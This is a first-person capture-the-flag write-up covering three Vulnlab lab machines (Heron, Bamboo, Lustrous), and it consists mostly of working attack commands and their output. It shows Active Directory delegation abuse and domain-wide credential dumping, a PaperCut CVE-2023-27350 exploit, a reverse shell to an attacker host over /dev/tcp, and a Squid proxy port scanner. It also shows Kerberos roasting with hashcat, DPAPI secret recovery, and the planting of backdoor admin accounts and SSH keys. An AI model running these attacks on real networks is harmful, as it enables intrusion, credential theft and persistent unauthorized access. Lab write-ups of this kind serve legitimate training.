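The point of the etype 23 entry is that the RC4-HMAC key is the unsalted MD4 of the UTF-16LE password, i.e. the NT hash, which is why a machine keytab hands you a pass-the-hash credential for FRAJMP$ directly. The AES keys are derived with the principal name as salt and are only usable as Kerberos keys (for example via getST's -aesKey).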

Some more enumeration shows that Depl<redacted>Dealt (the plink password from ssh.ps1) also works for julian.pratt, whose directory on the home$ share holds .lnk shortcuts for frajmp and mucjmp:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 12:47:14 2024
  ..                                  D        0  Sat Jun  1 17:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 12:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 17:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 17:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 12:47:33 2024

        6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\> 


From BloodHound we find that adm_prju is a member of ADMINS_T1, which has WriteAccountRestrictions over MUCDC.

WriteAccountRestrictions is write access to the User-Account-Restrictions property set on the computer object, and that set includes msDS-AllowedToActOnBehalfOfOtherIdentity. Being able to write that attribute lets us configure resource-based constrained delegation (RBCD) on MUCDC: we add a computer account we control (FRAJMP$, whose key we pulled from the keytab) to the attribute, then use S4U2self/S4U2proxy to obtain a service ticket for MUCDC as any user, including _admin.

Next, write the RBCD entry with impacket's rbcd.py:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4' 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:389  ...  OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)
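What impacket-rbcd actually writes, as an added example (not impacket's code and not part of the original writeup): msDS-AllowedToActOnBehalfOfOtherIdentity holds a self-relative security descriptor whose DACL lists the SIDs allowed to delegate to the computer. The builder below produces the same shape rbcd.py does (owner BA, one ACCESS_ALLOWED_ACE with full control per SID) and the parser reads it back, which is also how to audit the attribute from an LDAP dump. The FRAJMP$ SID is the one from the output above; everything else is mine.

```python
"""Build and parse the security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity."""
import struct

FULL_CONTROL = 0x000F01FF        # CCDCLCSWRPWPDTLOCRSDRCWDWO, the mask rbcd.py grants
BUILTIN_ADMINS = "S-1-5-32-544"  # owner rbcd.py uses (O:BA)
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000


def sid_to_bytes(sid):
    """Textual SID -> binary SID (revision, sub-authority count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split("-")
    assert parts[0] == "S", "not a SID"
    rev, authority, subs = int(parts[1]), int(parts[2]), [int(s) for s in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off=0):
    """Binary SID at buf[off:] -> (textual SID, consumed length)."""
    rev, n = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % n, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * n


def build_rbcd_sd(allowed_sids, owner=BUILTIN_ADMINS):
    """Self-relative SD: 20-byte header, owner SID, then a DACL with one allow ACE per SID."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size; then the access mask and the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces   # ACL_REVISION = 2
    owner_b = sid_to_bytes(owner)
    header_len = 20
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         header_len, 0, 0, header_len + len(owner_b))   # owner, group, SACL, DACL offsets
    return header + owner_b + acl


def parse_rbcd_sd(sd):
    """Return [(sid, mask)] for every plain allow ACE in the DACL; [] for an empty attribute."""
    if len(sd) < 20:
        return []
    rev, _, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:     # object ACEs (0x05) carry extra GUID fields; skipped here
            sid, _ = bytes_to_sid(sd, off + 8)
            allowed.append((sid, mask))
        off += ace_size
    return allowed


if __name__ == "__main__":
    frajmp = "S-1-5-21-1568358163-2901064146-3316491674-27101"   # FRAJMP$ from the rbcd.py output
    blob = build_rbcd_sd([frajmp])
    print(len(blob), "bytes:", blob.hex())
    print("allowed to act on behalf of other identity:", parse_rbcd_sd(blob))
```

rbcd.py's write action appends to whatever the attribute already holds. If you ever rebuild the descriptor by hand (ldapmodify, a custom tool), parse the current value first and keep its SIDs, otherwise you silently break legitimate delegation to that host and leave an obvious artifact for the blue team.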

Get the ticket

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache        

and run secretsdump with that ticket:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-secretsdump -k mucdc.heron.vl 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3
HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216
dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19
[*] NL$KM 
 0000   5C A7 E2 A0 9A 0F 0E A7  0A 6F 35 33 21 07 83 01   \........o53!...
 0010   93 8A 8A 6D 21 3B C2 CA  60 E6 E6 B6 5A 22 04 A2   ...m!;..`...Z"..
 0020   D1 F4 93 69 36 20 AF BB  F7 38 31 3A BE E5 D5 29   ...i6 ...81:...)
 0030   55 5E 2B 54 ED A4 1B 52  03 FD 77 75 AC F2 9A 58   U^+T...R..wu...X
NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:49667  ...  OK
_admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::

Get the flags:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Jun  6 17:01:47 2024
  --snip--
  System Volume Information         DHS        0  Sun May 26 11:48:42 2024
  transfer                            D        0  Sun May 26 13:51:27 2024
  Users                              DR        0  Sat Jun  1 17:43:04 2024
  webaccounting                       D        0  Fri Jun  7 08:14:04 2024
  Windows                             D        0  Sun Jun  2 17:26:03 2024

        6261499 blocks of size 4096. 1962809 blocks available

Beyond root

proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
-> RDP into MUCDC as _admin is not allowed, so create a local admin via wmiexec instead:


┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:49669  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin

C:\>net user /add puck Password123!
The command completed successfully.


C:\>net localgroup Administrators puck /add
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK

The command completed successfully.


$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389


---
C:\Users\puck>net user adm_hoka
User name                    adm_hoka
Full Name                    adm_hoka
Comment                      t0
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2024 4:50:28 AM
Password expires             Never
Password changeable          5/27/2024 4:50:28 AM
Password required            Yes
User may change password     Yes

Workstations allowed         admjmp_t0
Logon script                 \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory               \\mucdc.heron.vl\home$\adm_hoka
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *admins_t0
The command completed successfully.

---
logon.vbs contains:
Option Explicit

Dim objShell, bgInfoPath, bgInfoConfigPath

Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing



This chain was really fun 🙂

vulnlab-bamboo

vulnlab bamboo

nmap scan

# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http

# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds

squidscan

┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan                     
Port 22 found!
Port 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
Port 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s


Add the Squid proxy to /etc/proxychains4.conf so our tools reach the ports Squid can connect to:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128
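What squidscan is doing under the hood, as an added example that is not part of the original writeup or of the squidscan tool: ask the proxy to fetch http://target:port/ for every port and classify Squid's answer. The proxy and target addresses are the ones from the nmap scan; the classification rules are my reading of Squid's X-Squid-Error header (ERR_CONNECT_FAIL followed by the proxy host's errno) and should be taken as a heuristic, not a specification.

```python
"""Port-scan a host through a Squid forward proxy."""
import http.client
from concurrent.futures import ThreadPoolExecutor

PROXY = ("10.10.79.83", 3128)   # squid from the nmap scan
TARGET = "10.10.79.83"          # scan the proxy host itself: it reaches ports the firewall hides

# errno values as reported by a Linux Squid host (assumption: the proxy runs on Linux)
ECONNREFUSED, ETIMEDOUT, EHOSTUNREACH = 111, 110, 113


def classify(status, headers):
    """headers: dict with lower-cased keys. Returns 'open', 'closed', 'filtered' or 'denied'."""
    err = headers.get("x-squid-error", "")
    if err.startswith("ERR_CONNECT_FAIL"):
        parts = err.split()
        errno = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
        return "closed" if errno == ECONNREFUSED else "filtered"
    if err.startswith(("ERR_ACCESS_DENIED", "ERR_FORWARDING_DENIED")):
        return "denied"          # proxy ACL decision, says nothing about the port
    if err.startswith(("ERR_CONNECT_TIMEOUT", "ERR_READ_TIMEOUT")):
        return "filtered"
    # Anything else, including ERR_ZERO_SIZE_OBJECT / ERR_INVALID_RESP for non-HTTP listeners
    # or a 3xx/4xx/5xx produced by the backend, means the TCP connect went through.
    return "open"


def probe(port, timeout=5):
    conn = http.client.HTTPConnection(PROXY[0], PROXY[1], timeout=timeout)
    try:
        # The absolute-URI request form is how a client asks a forward proxy to fetch on its behalf.
        conn.request("GET", "http://%s:%d/" % (TARGET, port),
                     headers={"Host": "%s:%d" % (TARGET, port)})
        resp = conn.getresponse()
        return classify(resp.status, {k.lower(): v for k, v in resp.getheaders()})
    except (OSError, http.client.HTTPException):
        return "filtered"        # proxy unreachable or a malformed answer; treat conservatively
    finally:
        conn.close()


def scan(ports, workers=32):
    """Map port -> state for every port in `ports`, probing in parallel."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(zip(ports, pool.map(probe, ports)))


if __name__ == "__main__":
    for port, state in sorted(scan(range(1, 65536)).items()):
        if state != "closed":
            print("%5d %s" % (port, state))
```

A 302 to /user through the proxy, like the curl below, classifies as open; the proxy's 503 with ERR_CONNECT_FAIL 111 (ECONNREFUSED) is closed. Because Squid connects from its own host, it reaches listeners that a direct scan never sees, which is exactly why PaperCut on 9191 showed up.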


┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
< 
* Connection #0 to host 10.10.79.83 left intact

Exploiting CVE-2023-27350 (PaperCut NG/MF authentication bypass, used here to run commands through the print scripting interface as the papercut user)

wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py


First stage: fetch the reverse-shell script onto the target

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Second stage: execute it

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" 
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

s.sh contains:

#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1


catch the shell

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ 
zsh: suspended  rlwrap nc -nlvp 9001
                                                                                                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$ 

Let's add our key to authorized_keys to get a stable SSH shell:

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$

Now SSH in with the key and run linpeas and pspy on bamboo:

ssh -i papercut papercut@10.10.79.83


Privilege escalation

There is an authentication bypass script on Exploit-DB (https://www.exploit-db.com/exploits/51391) for the same CVE we started with. Running it prints the two URLs we need to visit:

➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

The PaperCut NG instance listens on 127.0.0.1:9191, so forward that port over SSH:

ssh -i papercut papercut@10.10.79.83 -L 9191:127.0.0.1:9191 -N

Browse to the PaperCut admin UI through the forwarded port.

Once the server-command script has been backdoored (below), click "Refresh servers" to trigger it; the setuid bit on /bin/bash afterwards confirms it ran as root.


papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$ 

papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash-5.1# cd /root
bash-5.1# ls
root.txt  snap
bash-5.1# cat root.txt
VL{48<redacted>26}
bash-5.1# 

That’s all.


vulnlab-lustrous

vulnlab lustrous

Lustrous is a medium-rated AD chain with two machines, LusMS and LusDC. Usernames from an anonymous FTP share on LusMS show that ben.cox does not require Kerberos pre-authentication, so his AS-REP hash can be requested and cracked. With WinRM access to LusMS, the local Administrator password turns up as a DPAPI-protected SecureString that can be converted back to plaintext, giving us SYSTEM on LusMS. The web application on LusDC requires Kerberos authentication; the service account svc_web has an SPN, so it can be kerberoasted and its password cracked, which lets us forge a silver ticket for http/lusdc as tony.ward, a member of Backup Operators, and read his password from the site. As a backup operator, impacket-reg saves the SAM, SYSTEM and SECURITY hives from LusDC, the LusDC machine account hash is recovered from them, and with it NTDS.dit is dumped for domain admin.

Writeup:

Enumerating anonymous FTP yields a list of usernames, saved as users.txt.

With those we check which accounts are AS-REP roastable (no Kerberos pre-authentication required):

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set


Kerberoasting works the same way once we have ben.cox's cracked password:

impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'

crack some hashes

The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt



Do some Bloodhound analysis, to find high valuable targets

bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp


$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


ServicePrincipalName    Name     MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc              svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             
http/lusdc.lustrous.vl  svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$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


Crack the TGS-REP hash with hashcat mode 13100:

hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt


WinRM to lusms.lustrous.vl as ben.cox

evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'

On Ben's Desktop we found admin.xml, an Export-Clixml representation of a PSCredential object.

The password inside is a SecureString protected with DPAPI under the account that exported it, so it only decrypts on the same machine as that user. Since we are running as ben.cox on LusMS, ConvertTo-SecureString followed by GetNetworkCredential() recovers the plaintext:


*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
</Props>
</Obj>
</Objs>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List


UserName       : Administrator
Password       : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain         :



*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 


Log on as Administrator, grab the flag and make ben.cox (plus a new user puck) local administrators:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{40<redacted>48}

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
